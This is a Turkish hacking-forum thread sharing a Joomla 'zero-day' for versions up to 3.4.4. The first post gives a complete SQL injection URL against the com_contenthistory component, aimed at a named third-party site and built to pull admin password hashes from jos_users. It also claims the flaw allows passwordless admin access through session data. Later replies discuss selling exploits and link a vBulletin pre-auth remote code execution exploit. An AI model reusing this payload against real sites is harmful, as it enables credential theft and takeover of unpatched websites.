Joomla 0Day Sql İnjection Exploit

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Kayıt Tarihi: 04/Eylül/2008
    Erkek

    joomla 3.4.4 versiyonuna kadar geçerli 3.4.5 de fix edildi

    bu açık 3.4.4 e kadar olan com_contenthistory mudülü kurulumda gelen çekirdek modülüdür ayrıca sension bilgilerinide alarak şifresiz admin paneline giriş yapıla biliniyor o açıda 3.4.5 versiyonunda fix edildi kolay gelsin

    http://huatoon.com/joomla/index.php?option=com_contenthistory&view=history&list[select]=(select%201%20FROM(select%20count(*),concat((select%20(select%20concat(password))%20FROM%20jos_users%20LIMIT%200,1),floor(rand(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)


    "Hayat zor olabilir ama ben de kolay sayılmam." insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    mrkps
    mrkps's avatar
    Kayıt Tarihi: 06/Kasım/2012
    Erkek

    paylaşım için teşekkürler...

    gördüğüm kadarıyla pek bir site yok...

  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    PHP-SEO Developer
    Erdem
    Erdem's avatar
    Kayıt Tarihi: 04/Haziran/2002
    Erkek

    Pek bi site olsa sence verirmi :)) Bunlar ilk çıktığında o sitelerde ücretle satılıyor 1000 dolar 2000 dolar hatta 3500 dolara bir wordpress açığıda satılıyordu.

    Güncel açığı kimse kimseye vermez :) Hele para verip almışsa verme ihtimali çok çok düşer.


    Php for SEO nun ardından Php for Gcode (CNC)
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    mrkps
    mrkps's avatar
    Kayıt Tarihi: 06/Kasım/2012
    Erkek

    yeni bir açık

    Vbulletin 5.1.X unserialize 0day preauth RCE exploit

     

    https://www.exploit-db.com/exploits/38629/

     

    buradada eleman derlemiş:http://mukarramkhalid.com/exploit-vbulletin-5-1-x-preauth-remote-code-execution/

    belki birinin işine yarar...

     

    mrkps tarafından 09/Kas/15 22:30 tarihinde düzenlenmiştir
Toplam Hit: 3006 Toplam Mesaj: 4
joomla 0day exploit